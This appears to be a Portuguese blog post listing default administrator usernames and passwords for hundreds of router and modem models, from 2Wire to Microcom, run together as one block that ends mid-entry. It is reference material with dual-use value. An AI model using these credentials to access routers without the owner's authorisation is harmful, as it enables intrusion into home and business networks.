Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

quinta-feira, 12 de março de 2015

Username e Senhas padrões de roteadores e modems

Se o Username ou Password estiver vazio significa que deve ser deixado em branco. Router Username Password (All Routers With DD-WRT v23 & v24 Firmware) root admin (All Routers With Routertech v2.8 Firmware) Admin Admin (All Routers With Tomato v1 Firmware) admin admin 2Wire – 1000HG (2Wire Firmware)   2Wire – 2071 (Prodigy Firmware)   2Wire – 2700HG-S (2Wire Firmware)   2Wire – 2700HGV-B2 (Sasktel Firmware)   2Wire – 2701-A (BigPond Firmware)   2Wire – 2701HG-B (AT&T Firmware)   2Wire – 2701HG-B (SBC Firmware)   2Wire – 2701HG-D (Qwest Firmware)   2Wire – 2701HG-G (Bell Firmware)   2Wire – 2701HG-G (Bell French Firmware)   2Wire – 2701HG-S (Embarq Firmware)   2Wire – 2701HG-T (Prodigy Firmware)   2Wire – 2701HGV-W (BigPond Firmware)   2Wire – 3800HGV-B (AT&T Firmware)   3COM – 3C510 (3COM Firmware)  admin 3COM – 3CRWDR100A-72 (3COM Firmware)  admin 3COM – 3CRWDR101A-75 (3COM Firmware)  admin 3COM – 3CRWDR200A-75 (3COM Firmware) admin admin 3COM – 3CRWE554G72T (3COM Firmware)  admin 3COM – 3CRWER100-75 (3COM Firmware)  admin 3COM – 3CRWER200-75 (3COM Firmware)  admin 3com – Superstack 2 3C16980 (Canopy Firmware)   Abbatec – TX3 (Abbatec Firmware) admin admin Abocom – WAP-354NB (Abocom Firmware)   Abocom – WR254 (Abocom Firmware) admin  Accton – CheetahAccess AC-IG1004 (Accton Firmware)   Acorp – LAN410 (Acorp Firmware) admin admin Actiontec – GT701 (Actiontec Firmware)   Actiontec – GT701 v2 (Qwest Firmware)   Actiontec – GT701WG v2 (Qwest Firmware)   Actiontec – GT701-WRU (Actiontec Firmware)   Actiontec – GT704-WG (Actiontec v3.0 Firmware)   Actiontec – GT704WG (Actiontec v3.20 Firmware) admin password Actiontec – GT704WG (Qwest Firmware)   Actiontec – GT704WG (Verizon Firmware) admin password Actiontec – GT724WGR (Actiontec Firmware)   Actiontec – M1000 (Qwest v1 Firmware)   Actiontec – M1000 (Qwest v2 Firmware)   Actiontec – MI424WR (Verizon Firmware) admin password1 Actiontec – MI424WR-GEN2 (Verizon Firmware) admin password1 Actiontec – PK5000 (Qwest Firmware)   Actiontec – Q1000 (Qwest Firmware)   Actiontec – R1520SU (Qwest Firmware)   Actiontec – RI408 (Actiontec Firmware) admin password1 Addon – GWAR3000 (Addon Firmware) Admin Admin Addon – GWAR3500 (Addon Firmware) admin admin Advantek Networks – AWR-854G (Advantek Networks Firmware) admin admin Aethra – EB1060 (Aethra Firmware) admin password Aethra – FS4104-AW (Aethra Firmware) admin  Aethra – SV1042 (Aethra Firmware) admin  AGK Nordic – WA-4054 (AGK Nordic Firmware)  admin AirLink – AR430W (AirLink Firmware) admin admin AirLink – AR525W (AirLink Firmware) admin admin AirLink – AR670W (AirLink Firmware) admin admin Airlive – Ovislink IP-1000R (Airlive Firmware) admin airlive Airlive – WL-8064ARM (Airlive Firmware) admin airlive Airlive – WT-2000ARM (Airlive Firmware) admin airlive Airlive – WT-2000R (Airlive Firmware) admin ecom Airties – RT-101 (Airties Turkish Firmware)   Airties – RT-104 (Airties Turkish Firmware)   Airties – RT-204 (Airties Firmware)   Airties – RT-205 (Airties Turkish Firmware)   Airties – RT-211 (Airties EN, GR & TR Firmware)   Airties – Wav-180 (Airties Turkish Firmware)   Alice – AH4021 v2 (Alice French Firmware) alice alice Alice – Gate 2 Plus (Telecom Italia Firmware)   Alice – Gate Voip 2 Plus Wi-Fi (Alice Italian Firmware)   Alice – Gate W2+ (Telecom Italia Firmware)   Alice – IAD WLAN 3231 (Alice German Firmware)   A-Link – RoadRunner 24AP (A-Link Firmware) admin password A-Link – RR24 (A-Link Firmware) admin password A-Link – WL54AP3 (A-Link Firmware)   Allied Data – Copperjet 1616P2 (Allied Data Firmware) user user Allied Telesyn – AT-ARW256E (Allied Telesyn Firmware) manager friend Allnet – ALL1296 (Allnet Firmware)   Alpha Networks Inc – IGD (Alpha Networks Firmware) admin  Alvarion – BreezeMax (Alvarion Firmware) admin admin Ambit – U10C019 (Ambit Firmware) admin cableroot Ambit – U10C022 (Ambit Firmware) admin cableroot Aolynk – DR814Q (Aolynk Firmware) admin admin AOpen – AOI-908 (Aopen Firmware)  admin AOpen – AOR-401 (AOpen Firmware) admin 1234 Arcor – DSL-Easybox 602 (Vodafone German Firmware) root 123456 Arlotto – RB14S (Arlotto Firmware) admin 0000 Arris – WTM552 (Arris Firmware)   Articonet – ACN – 110R (Articonet Firmware) admin admin Asus – AAM6020BI (Asus Firmware) admin admin Asus – AAM6020VI-T4 (Asus Firmware) admin admin Asus – AM602 (Asus Firmware) admin admin Asus – AM604 (Asus Firmware) admin admin Asus – AR7WRD (Asus Firmware) admin 1234 Asus – DSL-N13 (Asus Firmware) admin admin Asus – RT-G32 (Asus Firmware) admin admin Asus – RT-N15 (Asus Firmware) admin admin Asus – RX3041 (Asus Firmware) admin admin Asus – WL-500G (Asus Firmware) admin admin Asus – WL-500GP V2 (Asus Firmware) admin admin Asus – WL-500W (Asus Firmware) admin admin Asus – WL-520G (Asus Firmware) admin admin Asus – WL-520GC (Asus Firmware) admin admin Asus – WL-520GU (Asus Firmware) admin admin Asus – WL-530G (Asus Firmware) admin admin Asus – WL-566gM (Asus Firmware) admin admin Asus – WL-600G (Asus Firmware) admin admin Asus – WL-700GE (Asus Firmware) admin admin Asus – WL-AM604G (Asus Firmware) admin admin Ativa – 54G (Ativa Firmware)   Atlantis Land – A02RBW54 (Atlantis Land Firmware) admin admin Atlantis Land – VoIPMaster 260W (Atlantis Land Firmware) admin atlantis Atlantis Land – Webshare 141W (Atlantis Land Firmware) admin admin Atlantis Land – WebShare 242W (Atlantis Land Firmware) admin admin AusLinx – AL-2007 (Conexant Firmware)   Axesstel – CDMA 1xEV-D0 (Axesstel Firmware) admin admin Axesstel – MV400i (Axesstel Firmware) admin admin Axesstel – MV430i (Axesstel Firmware) admin admin Aztech – DSL1015EN (Aztech Firmware) admin admin Aztech – DSL305EU (Aztech Firmware)   Aztech – DSL605ER (Aztech Firmware) admin admin Aztech – DSL605EW (Aztech Firmware) admin admin AzureWave – AW-NR580 (AzureWave Firmware)   Bandluxe – R100 (Bandluxe Firmware) admin hsparouter Bandridge – CWN7007G (Bandridge Firmware)   BaudTec – T263R1U (BaudTec Firmware) admin 1234 BaudTec – TW263R4-A0 (BaudTec Firmware) admin 1234 BEC – 7402TM (BEC Firmware) admin admin Beetel – 110BX1 (Beetel Firmware) admin password Beetel – 110TC1 (Beetel Firmware) admin password Beetel – 220BX (Beetel Firmware) admin password Beetel – 220BXI (Beetel Firmware) admin password Beetel – 450BXI (Beetel Firmware) admin password Beetel – 450TC1 (Beetel Firmware) admin 1234 Belgacom – B-Box 2 (Belgacom Firmware)  admin Belgacom – BBOX 6726 (Belgacom Firmware)  admin Belkin – F1PI241EGau (iinet.net.au Firmware)  admin Belkin – F1PI242EGau (iinet.net.au Firmware)  admin Belkin – F5D5231-4 (Belkin Firmware)   Belkin – F5D6321-4 (Belkin Firmware)   Belkin – F5D7230-4 v1 (Belkin Firmware)   Belkin – F5D7230-4 v2 (Belkin Firmware)   Belkin – F5D7230-4 v6 (Belkin Firmware)   Belkin – F5D7230-4 v7 (Belkin Firmware)   Belkin – F5D7230-4 v8 (Belkin Firmware)   Belkin – F5D7230-4 v9 (Belkin Firmware)   Belkin – F5D7231-4 (Belkin Firmware)   Belkin – F5D7231-4 v2 (Belkin Firmware)   Belkin – F5D7231-4P v1 (Belkin Firmware)   Belkin – F5D7234-4 v1 (Belkin Firmware)   Belkin – F5D7234-4 v3 (Belkin Firmware)   Belkin – F5D7234-4 v3 (Belkin v3.00.03 Firmware)   Belkin – F5D7234-4 v4 (Belkin Firmware)   Belkin – F5D7234-4 v5 (Belkin Firmware)   Belkin – F5D7630-4 (Belkin Firmware)   Belkin – F5D7632-4 v1 (Belkin Firmware)   Belkin – F5D7633-4 UK (Belkin Firmware)   Belkin – F5D7634-4 (Belkin Firmware)   Belkin – F5D8230-4 (Belkin Firmware)   Belkin – F5D8231-4 v2 (Belkin Firmware)   Belkin – F5D8231-4 v5 (Belkin Firmware)   Belkin – F5D8232-4 v1 (Belkin Firmware)   Belkin – F5D8233-4 v1 (Belkin Firmware)   Belkin – F5D8233-4 v3 (Belkin Firmware)   Belkin – F5D8233-4 v4 (Belkin Firmware)   Belkin – F5D8235-4 v1 (Belkin Firmware)   Belkin – F5D8235-4 v2 (Belkin Firmware)   Belkin – F5D8236-4 v1 (Belkin Firmware)   Belkin – F5D8236-4 v2 (Belkin Firmware)   Belkin – F5D8236-4 v3 (Belkin Firmware)   Belkin – F5D8631-4 v2 (Belkin Firmware)   Belkin – F5D8631-4 v3 (Belkin Español Firmware)   Belkin – F5D8631-4 v3 (Belkin Firmware)   Belkin – F5D8632-4 v1 (Belkin Firmware)   Belkin – F5D8633-4 v1 (Belkin Firmware)   Belkin – F5D8635-4 v1 (Belkin Firmware)   Belkin – F5D8636-4 v1 (Belkin Firmware)   Belkin – F5D8636-4 v2 (Belkin Firmware)   Belkin – F5D9230-4 v5 (Belkin Firmware)   Belkin – F5D9231-4 v1 (Belkin Firmware)   Belkin – F5D9630-4 (Belkin Firmware)   Belkin – F5D9630-4 UK (Belkin Firmware)   Belkin – F6D4230-4 v3 (Belkin Firmware)   Belkin – F6D4320-4 v1 (Belkin Firmware)   Belkin – F6D4630-4 v1 (Belkin Firmware)   BestData – EA142 (Conexant Firmware) root root Bewan – 600 G (Bewan French Firmware) bewan bewan Billion – BiPac 5100A (Billion Firmware) admin admin Billion – BiPac 5102S (Billion Firmware) admin admin Billion – BiPac 5112S (Billion Firmware) admin password Billion – BiPac 5200G (Billion Firmware) admin admin Billion – BiPac 5200N (Billion Firmware) admin admin Billion – BiPac 5210S (Billion Firmware) admin admin Billion – BiPac 7300G (Billion Firmware) admin admin Billion – BiPac 7300RA (Billion Firmware) admin admin Billion – BiPac 7402GXL (Billion Firmware) admin admin Billion – BiPac 7404VNPX (Billion Firmware) admin admin Billion – BiPac 7500G (Billion Firmware) admin password Black Copper – BCWR54G (Black Copper Firmware) guest guest BLUE COM – BCOM-5330 (BLUE COM Firmware) admin admin BLUE COM – BCOM-5390 (BLUE COM Firmware) Admin Admin Bountiful – BWRG500 (Bountiful Firmware) admin admin BSNL – DNA-A211-1 (BSNL Firmware) admin admin BT – HOME HUB 1.0 (BT Firmware)   BT – HOME HUB 2.0 (BT Firmware) admin admin BT – Voyager 2100 (BT Firmware) admin admin BT – Voyager 2110 (BT Firmware) admin admin BT – Voyager 220v (BT Firmware) admin admin BT – Voyager 2500v (BT Firmware) admin admin Buffalo – WHR-G (Buffalo Japanese Firmware) root  Buffalo – WHR-G54S (Buffalo Firmware) root  Buffalo – WHR-G54S (Buffalo Firmware) admin admin Buffalo – WZR2-G300N (Buffalo Firmware) root  Buffalo – WZR2-G300N (Buffalo Japanese Firmware) root  Buffalo – WZR-HP-G300NH (Buffalo Firmware) root  Canyon – CN-BR1 (Canyon Firmware) admin admin Canyon – CN-WF514 (Canyon Firmware) admin 1234 Caremo – X8268R (Caremo Firmware) admin admin Cerberus – ADSL Wifi 802.11g (Cerberus Firmware) Admin Admin Cisco – EPC2325 (Cisco Firmware)  admin Cisco – EPC2425 (Cisco Firmware)  admin CNET – CAR-845 (Texas Instruments Firmware) Admin Admin CNet – CNAD804-NF (Conexant Firmware) admin epicrouter CNet – CWR-854V (CNet Firmware) root 1234 Comstar – WA-6202-V2 (Comstar Firmware)   Comtrend – AR-5321U (Comtrend Firmware) admin admin Comtrend – CT-5072S (Comtrend Firmware) root 1234 Comtrend – CT-536+ (Comtrend Firmware) 1234 1234 Comtrend – CT-5361 (Comtrend Firmware) admin admin Comtrend – CT-5361T (Comtrend Firmware) root 12345 Comtrend – CT-5367 (Comtrend Firmware) admin admin Comtrend – CT-5611 (Comtrend Firmware) root 1234 Comtrend – CT-5621 (Comtrend Firmware) root 1234 Comtrend – CT-6383 (Comtrend Firmware) user pass Conceptronic – C54APRA (Conceptronic Firmware) admin admin Conceptronic – C54BRS4 (Conceptronic Firmware) admin 1234 Conceptronic – C54BRS4A (Conceptronic Firmware) admin admin Conitech – CN405APRT54 (Conitech Firmware) admin admin Conitech – CN416EU (Conitech Firmware) admin admin Conitech – CNKITADSLWL54 (Conitech Firmware) admin admin Connection N&C RBW54 (Connection N&C Firmware) admin admin Cradlepoint – MBR1000 (Cradlepoint Firmware)   Creative – Wireless ADSL 8426 (Creative Firmware) admin admin Darelink – DSL136E (Darelink Firmware)   Davolink – DV-201AM (Davolink Firmware) user user Davolink – DV-201AMR (Davolink Firmware) user user Davolink – DV-2020 (Davolink Firmware) user user Dell – 2350 (Dell Firmware) admin password Deltaco – WLAN-104 (Deltaco Firmware)   Digicom – 8E4411 (Digicom Firmware) admin admin Digicom – Adsl2 Combo (Digicom Firmware) admin admin Digicom – DDSL-101R (Digicom Firmware) admin admin Digicom – Michelangelo LAN TX II (Digicom Firmware) admin admin Digicom – Michelangelo Wave (Digicom Firmware) admin admin Digicom – Michelangelo Wave 108 (Digicom Firmware)  admin Digiconnect – WIC328 (Digiconnect Firmware) admin 1234 D-Link – DGL-4100 (D-Link Firmware) admin  D-Link – DGL-4300 (D-Link Firmware) admin  D-Link – DGL-4500 (D-Link Firmware) admin  D-Link – DI-524 (D-Link v2 Firmware) admin  D-Link – DI-524 (D-Link v3 Firmware) admin  D-Link – DI-524 (D-Link v5 Firmware) admin  D-Link – DI-524UP (D-Link Firmware) admin  D-Link – DI-604 (D-Link Firmware) admin  D-Link – DI-604 (D-Link Russian Firmware) admin  D-Link – DI-604+ (D-Link Chinese Firmware) admin  D-Link – DI-614+ (D-Link Firmware) admin  D-Link – DI-624 (D-Link v4 Firmware) admin  D-Link – DI-624 (D-Link v5 Firmware) admin  D-Link – DI-624S (D-Link Firmware) admin admin D-Link – DI-634M (D-Link Firmware) admin  D-Link – DI-704P (D-Link Firmware) admin  D-Link – DI-704UP (D-Link Firmware) admin  D-Link – DI-808HV (D-Link Firmware) admin  D-Link – DI-824VUP (D-Link Firmware) admin  D-Link – DI-LB604 (D-Link Firmware) admin  D-Link – DIR-100 (D-Link Firmware) admin  D-Link – DIR-280 (D-Link Firmware) admin  D-Link – DIR-300 (D-Link Firmware) admin  D-Link – DIR-301 (D-Link Firmware) admin  D-Link – DIR-400 (D-Link v1 Firmware) admin  D-Link – DIR-600 (D-Link Firmware) admin  D-Link – DIR-615 (D-Link v1 Firmware) admin  D-Link – DIR-615 (D-Link v2 Firmware) admin  D-Link – DIR-615 (D-Link v3 Firmware) admin  D-Link – DIR-615 (D-Link v4 Firmware) admin  D-Link – DIR-625 (D-Link v1 Firmware) admin  D-Link – DIR-625 (D-Link v3 Firmware) admin  D-Link – DIR-628 (D-Link Firmware) admin  D-Link – DIR-635 (D-Link Firmware) admin  D-Link – DIR-655 (D-Link Firmware) admin  D-Link – DIR-825 (D-Link Firmware) admin  D-Link – DIR-855 (D-Link Firmware) admin  D-Link – DSL-2500U (D-Link Firmware) admin admin D-Link – DSL-2520U (D-Link Firmware) admin admin D-Link – DSL-2540B (D-Link Firmware) admin admin D-Link – DSL-2540T (D-Link Firmware) admin admin D-Link – DSL-2540U (D-Link Firmware) admin admin D-Link – DSL-2542B (D-Link Firmware) admin admin D-Link – DSL-2600U (D-Link Firmware) admin admin D-Link – DSL-2640B (D-Link Firmware) admin admin D-Link – DSL-2640R (D-Link Firmware) admin admin D-Link – DSL-2640T (D-Link Firmware) admin admin D-Link – DSL-2640U (D-Link Firmware) admin admin D-Link – DSL-2641B (D-Link Firmware) admin admin D-Link – DSL-2740B (D-Link Firmware) admin admin D-Link – DSL-2740R (D-Link Firmware) admin admin D-Link – DSL-2741B (D-Link Firmware) admin admin D-Link – DSL-302G (D-Link Firmware) admin admin D-Link – DSL-500B (D-Link Firmware) admin admin D-Link – DSL-500G (D-Link Firmware) admin  D-Link – DSL-500G Generation II (D-Link Firmware) admin admin D-Link – DSL-500T (D-Link Firmware) admin admin D-Link – DSL-502G (D-Link Firmware) admin admin D-Link – DSL-502T (D-Link Firmware) admin admin D-Link – DSL-504G (D-Link Firmware) admin admin D-Link – DSL-504T (D-Link Firmware) admin admin D-Link – DSL-520B (D-Link Firmware) admin admin D-Link – DSL-520T (D-Link Firmware) admin admin D-Link – DSL-522T (D-Link Firmware) admin admin D-Link – DSL-524B (D-Link Firmware) admin admin D-Link – DSL-524T (D-Link Firmware) admin admin D-Link – DSL-584T (D-Link Firmware) admin admin D-Link – DSL-G604T (D-Link Firmware) admin admin D-Link – DSL-G624M (D-Link Firmware) admin admin D-Link – DSL-G624T (D-Link v3.0 Firmware) admin admin D-Link – DSL-G624T (D-Link v3.1 Firmware) admin admin D-Link – DSL-G804V (D-Link Firmware) admin admin D-Link – DVA-G3170i (D-Link Firmware) admin admin D-Link – DVA-G3340S (D-Link Firmware) admin admin D-Link – DVA-G3670B (D-Link Firmware) admin admin D-Link – DVA-G3810BN (Telus Firmware) admin telus D-Link – DVA-G3810BNTL (Telus Firmware) admin telus D-Link – EBR-2310 (D-Link v1 Firmware) admin  D-Link – EBR-2310 (D-Link v2 Firmware) admin  D-Link – GLB-502C (D-Link Firmware) admin admin D-Link – GLB-502T (D-Link Firmware) admin admin D-Link – GLB-802C (D-Link Firmware)   D-Link – VWR (Vontage Firmware) user user D-Link – WBR-1310 (D-Link v2 Firmware) admin  D-Link – WBR-1310 (D-Link v4 Firmware) admin  D-Link – WBR-2310 (D-Link Firmware) admin  Dovado – UMR (Dovado Firmware) admin 0000 Draytek – Vigor2200E-Plus (Draytek Firmware) admin admin Draytek – Vigor2500 (Draytek Firmware) admin admin Draytek – Vigor2700 (Draytek Firmware) user user Draytek – Vigor2700e (Draytek Firmware) admin admin Draytek – Vigor2800vg (Draytek Firmware) admin admin Draytek – Vigor2820 (Draytek Firmware) user user Draytek – Vigor2910 (Draytek Firmware) admin admin Draytek – Vigor2930 (Draytek Firmware) user user DSE – XH9948 (DSE Firmware) admin password DSE – XH9950 (DSE Firmware) admin password DSLink – 260E (DSLink Firmware) root root Dynalink – RTA1025W (Dynalink Firmware) admin admin Dynalink – RTA1320 (Dynalink Firmware) admin admin Dynalink – RTA220 (Dynalink Firmware)  admin Dynamode – BR-6004 W-G1 (Dynamode Firmware) guest guest Dynamode – R-ADSL-C4W-EG (Dynamode Firmware) admin password Dynex – DX-E401 (Dynex Firmware) admin  Dynex – DX-E402 (Dynex Firmware) admin password Dynex – DX-WEGRTR v1 (Dynex Firmware)   Eci – B-FOCuS 342+ WTR (Eci Firmware) admin password Ecom – EW125TGAR (Ecom Firmware) admin ecom Edimax – 3G-6200WG (Edimax Firmware) admin 1234 Edimax – AR-7024Wg (Edimax Firmware) admin epicrouter Edimax – AR-7064 A (Edimax Firmware) admin admin Edimax – AR-7084G A (Edimax Firmware) admin 1234 Edimax – BR-6104K (Edimax Firmware) admin 1234 Edimax – BR-6104KP (Edimax Firmware)   Edimax – BR-6204WG (Edimax Firmware) admin 1234 Edimax – BR-6204WLG (Edimax Firmware) admin 1234 Edimax – BR-6216Mg (Edimax Firmware) admin 1234 Edimax – BR-6504N (Edimax Firmware) admin 1234 Edimax – BR-6624 (Edimax Firmware) admin  Eminent – EM3032 (Eminent Firmware)  admin Eminent – EM4012 (Eminent Firmware)  admin Eminent – EM4013 (Eminent Firmware)  admin Eminent – EM4040 nShare (Eminent Firmware)  admin Eminent – EM4204 (Eminent Firmware) Admin Admin Eminent – EM4218 (Eminent Firmware) admin admin Eminent – EM4420 (Eminent Firmware) admin admin Eminent – EM4422 nShare (Eminent Firmware)  admin Eminent – EM4551 wLINK 300 Pro (Eminent Firmware) admin admin Encore – ENDSL-A2+WIGX2 v1 (ENCORE Firmware) admin trendchip Encore – ENDSL-AR4 (Conexant Firmware) admin conexant Encore – ENHWI-G IEEE 802.11g (Encore Firmware) admin admin Encore – ENHWI-G2 (Encore Firmware) admin admin Encore – ENHWI-G3 (Encore Firmware) admin admin Encore – ENHWI-N (Encore Firmware) admin admin Encore – ENHWI-SG (Encore Firmware) admin admin Encore – ENRTR-104 (Encore Firmware)  admin Engenius – ESR-9750G (Engenius Firmware) admin admin Engenius – ESR-9850 (Engenius Firmware) admin admin Ericsson – HN294dp (Ericsson Firmware) admin admin Ericsson – W25 (Ericsson Firmware) admin admin E-tech – RTBR01 (E-tech Firmware)  admin E-tech – RTBR03 (E-tech Firmware)  admin E-tech – WGRT04 (E-tech Firmware) admin admin E-tech – WLRT03 (E-tech Firmware)  admin Etisalat – e960 (Etisalat Firmware)   Eumex – 300IP (Eumex German Firmware)   Exper – ECM-01 (Exper Turkish Firmware) admin ttnet Fritz!Box – Fon WLAN 7050 (Fritz!Box German Firmware)   Fritz!Box – Fon WLAN 7141 (Fritz!Box German Firmware)   Fritz!Box – Fon WLAN 7170 (Fritz!Box Firmware)   Fritz!Box – Fon WLAN 7240 (Fritz!Box Firmware)   Fujitel – FCC-W541R (Fujitel Firmware) admin admin Generic – 4-Port 802.11g 54Mbps (Check Router Pic) admin admin Gigabyte – GN-B41G (Gigabyte Firmware) admin admin GlobalTronic – GTR 2401KP (GlobalTronic Firmware) admin admin Gnet – IP0006 (Gnet Firmware)  admin GTS – Telecom (GTS Firmware) admin admin Haltel – HTN-5200 (Haltel Firmware) admin admin Hamlet – HNWS254 (Hamlet Firmware) admin  Hamlet – HRDSL512W_R (Hamlet Firmware) admin hamlet Hamlet – HRDSL5400W (Hamlet Firmware) admin hamlet Hatari – HW-AA101 (TrendChip Firmware) admin 1234 Hawking – HWR54G (Hawking Firmware) admin  Hayes – 15810 (Hayes Firmware) admin hayesadsl Hfcl – ADSL (Hfcl Firmware) admin password Huawei – B933 (Smart Bro Firmware)   Huawei – E960 (Etisalat Firmware)   Huawei – E960 (STC Firmware) admin admin Huawei – Echolife HG510 (Huawei Firmware) admin admin Huawei – Echolife HG510 (Romania Tel Firmware) admin admin Huawei – Echolife HG510 (Serbian Telekom Firmware) admin admin Huawei – EchoLife HG520b (Huawei Firmware) admin admin Huawei – EchoLife HG520b (TT Firmware) admin admin Huawei – EchoLife HG520i (To2Proxy Firmware) admin admin Huawei – EchoLife HG520s (Saudi Telecom Firmware) Afaq_shamel stccpe_2007 Huawei – EchoLife HG520s (TT Firmware) admin admin Huawei – Echolife HG553 (Vodafone Italian Firmware)   Huawei – GlobeSurfer II (Virgin Broadband Firmware) virgin password Huawei – Quidway WA1003A (Huawei Firmware) admin admin Huawei – SmartAX MT841 (Huawei Firmware) admin admin Huawei – SmartAX MT880 (Huawei Firmware) admin admin Huawei – SmartAX MT880 (Triple-T Firmware) admin admin Huawei – SmartAX MT880 (Version E.37 Firmware) admin admin Huawei – SmartAX MT882 (CanTV Firmware) admin admin Huawei – SmartAX MT882 (JazzTel Firmware) admin admin Huawei – SmartAX MT882 (Opal Firmware) admin admin Huawei – SmartAX MT882 (SrpskeTel Firmware) admin admin Huawei – SmartAX MT882a (FAWRI Firmware) admin admin Huawei – SmartAX MT882a (Huawei Firmware) admin admin Huawei – SmartAX MT882a (Viettel Firmware) admin admin Icidu – NI-707513 (Icidu Firmware) admin password Inexq – ISO50T (Inexq Firmware) admin 1234 Intelbras – GKM 1200 E (Intelbras Firmware) admin admin Intelbras – GKM 1210 Q (Intelbras Portuguese Firmware) admin admin Intelbras – WRG 240 E (Intelbras Portuguese Firmware) admin admin Intellinet – 523431 (Intellinet Firmware) root  Intellinet – 523455 (Intellinet Firmware) admin admin Inteno – EG101 (Inteno Firmware) admin admin Intercross – xDSL 5633 E (Uhtepkpocc Firmware) admin admin Intracom – JetSpeed IAD-Wp2 (Intracom Firmware) telekom telekom Intracom – NetFasteR IAD (Intracom Firmware) admin admin Intracom – NetFasteR IAD 2 (Intracom Firmware) admin admin Inventel – DV4210-WA (Livebox French Firmware) admin admin Inventel – DV4210-WS (Livebox Firmware) admin admin IP-Com – R402+ (IP-Com Chinese Firmware) admin admin ipTime – IP0803 (ipTime Firmware) root  ipTime – N604M (ipTime Korean Firmware)   Iskratel – SI2000 Callisto821+ (Iskratel Firmware) admin admin Jensen Scandinavia – Air:link 2954 (Jensen Scandinavia Firmware) admin admin Jensen Scandinavia – Air:link 59300 (Jensen Scandinavia Firmware) admin 1234 Jensen Scandinavia – Air:link 89300 (Jensen Scandinavia Firmware) admin 1234 Jnet – JN-DS5400 (Jnet Firmware) admin password Kaiomy – 550B-4P (Kaiomy Firmware) admin epicrouter Kaiomy – 550B-4P2 (Kaiomy Firmware) admin admin Kaiomy – APR-4P (Kaiomy Firmware) guest guest Kasda – KD318MUI (Kasda Firmware) admin adslroot Kasda – V2Plus (Kasda Firmware) admin adslroot KCORP – KLG-575 (KCORP Firmware) admin admin KCORP – KLS-575 (KCORP Firmware)   KCORP – KLS-5810 (KCORP Firmware) admin password Keyteck – NET-25GSU (Keyteck Firmware) admin admin Kobishi – 8K (Kobishi Firmware)   Konig – CMP-WNROUT10 (Konig Firmware) admin admin Konig – CMP-WNROUT30 (Konig Firmware) admin 1234 Kozumi – K-5400GR (Kozumi Firmware) guest guest Kozumi – KM-410WG (Kozumi Firmware) admin admin Kraun – Kr.1W (Kraun Firmware) admin admin Kraun – Kr.XL (Kraun Firmware) admin admin Kyocera – KR2 (Kyocera Firmware)  admin Lantech – AR-2000 (Conexant Firmware) root root Levelone – FBR-1161A (Levelone Firmware) admin admin Levelone – WBR-3406TX (Levelone Firmware) admin admin Levelone – WBR-3408 (Levelone Firmware) admin  Levelone – WBR-3800 (Levelone Firmware)  password Levelone – WBR-6001 (Levelone Firmware)  password Leviton – GB4 (Leviton Firmware) admin admin Linkpro – A2WR-430A (Linkpro Firmware) admin admin Linkskey – LKR-604 (Linkskey Firmware) admin  Linksys – AG241 (Linksys Firmware) admin admin Linksys – AM200 (Linksys Firmware) admin admin Linksys – AM300 (Linksys Firmware) admin admin Linksys – BEFSR11 (Linksys Firmware)  admin Linksys – BEFSR41 (Linksys v1 Firmware)  admin Linksys – BEFSR41 (Linksys v2 Firmware)  admin Linksys – BEFSR41v4 (Linksys Firmware)  admin Linksys – BEFSR81 (Linksys Firmware)  admin Linksys – BEFSRU31 (Linksys Firmware)  admin Linksys – BEFSX41 (Linksys Firmware)  admin Linksys – BEFW11S4 (Linksys Firmware)  admin Linksys – NR041 (Network Everywhere Firmware)  admin Linksys – RT31P2 (Linksys Firmware)  admin Linksys – RTP300 (Linksys Firmware) admin admin Linksys – RV042 (Linksys Firmware) admin admin Linksys – RVS 4000 (Linksys Firmware) admin admin Linksys – SPA-2100 (Linksys Firmware)  admin Linksys – SPA-2102 (Linksys Firmware)  admin Linksys – SPA-3102 (Linksys Firmware)  admin Linksys – WAG160N (Linksys Italian Firmware)  admin Linksys – WAG200G (Linksys Portuguese Firmware)  admin Linksys – WAG300N (Linksys Portuguese Firmware) admin admin Linksys – WAG325N (Linksys Firmware) admin admin Linksys – WAG354G (Linksys Firmware)  admin Linksys – WAG54G2 (Linksys Firmware) admin admin Linksys – WAG54GS (Linksys Firmware) admin admin Linksys – WCG200 ver.2 (Linksys Firmware)  admin Linksys – WCG200-CC (Comcast Firmware) comcast 1234 Linksys – WRH54G (Linksys Firmware)  admin Linksys – WRK54G (Linksys Firmware)  admin Linksys – WRT100 (Linksys Firmware)  admin Linksys – WRT110 (Linksys Firmware)  admin Linksys – WRT120N (Linksys Firmware) admin admin Linksys – WRT150N (Linksys Firmware)  admin Linksys – WRT160N (Linksys Firmware)  admin Linksys – WRT160N v2 (Linksys Firmware)  admin Linksys – WRT160N v3 (Linksys Firmware)  admin Linksys – WRT300N (Linksys Firmware)  admin Linksys – WRT300N v1.1 (Linksys Firmware) admin admin Linksys – WRT310N (Linksys Firmware)  admin Linksys – WRT320N (Linksys Firmware)  admin Linksys – WRT350N (Linksys Firmware)  admin Linksys – WRT400N (Linksys Firmware)  admin Linksys – WRT54G (Hyperlite Firmware)  admin Linksys – WRT54G (Linksys Firmware)  admin Linksys – WRT54G (Linksys v2 Firmware)  admin Linksys – WRT54G (Linksys v4 Firmware)  admin Linksys – WRT54G (Linksys v8 Firmware)  admin Linksys – WRT54G (Satori-4.0 Firmware By Sveasoft)  admin Linksys – WRT54G (Talisman Firmware) admin admin Linksys – WRT54G2 (Linksys v1.0 Firmware)  admin Linksys – WRT54G2 (Linksys v1.5 Firmware)  admin Linksys – WRT54G3G (Linksys Italian Firmware) admin admin Linksys – WRT54GC (Linksys Firmware)  admin Linksys – WRT54GC (Linksys Italian Firmware)  admin Linksys – WRT54GH (Linksys Firmware) admin admin Linksys – WRT54GL (Linksys Firmware)  admin Linksys – WRT54GP2A-AT (Linksys Firmware)  admin Linksys – WRT54GS (Linksys Firmware)  admin Linksys – WRT54GS (Linksys v7 Firmware)  admin Linksys – WRT54GS2 (Linksys Firmware)  admin Linksys – WRT54G-TM (Linksys Firmware)  admin Linksys – WRT54GX2 (Linksys Firmware)  admin Linksys – WRT54GX4 (Linksys Firmware)  admin Linksys – WRT55AG (Linksys Firmware)  admin Linksys – WRT600N (Linksys Firmware)  admin Linksys – WRT610N (Linksys Firmware)  admin Linksys – WRTP54G (Linksys Firmware) admin admin Linksys – WRTU54G-TM (Linksys Firmware) admin admin Linksys – WRV200 (Linksys Firmware)  admin Linksys – WRVS4400N (Linksys Firmware) admin admin Mecer – WAR25TC (Addon Firmware) admin admin Meetus – AMT1004 (Meetus Firmware) admin adslnadam Mercury – MW54R (Mercury Chinese Firmware) admin admin Microcom – AD 2656 (Microcom Firmware) admin epicrouter Micronet – 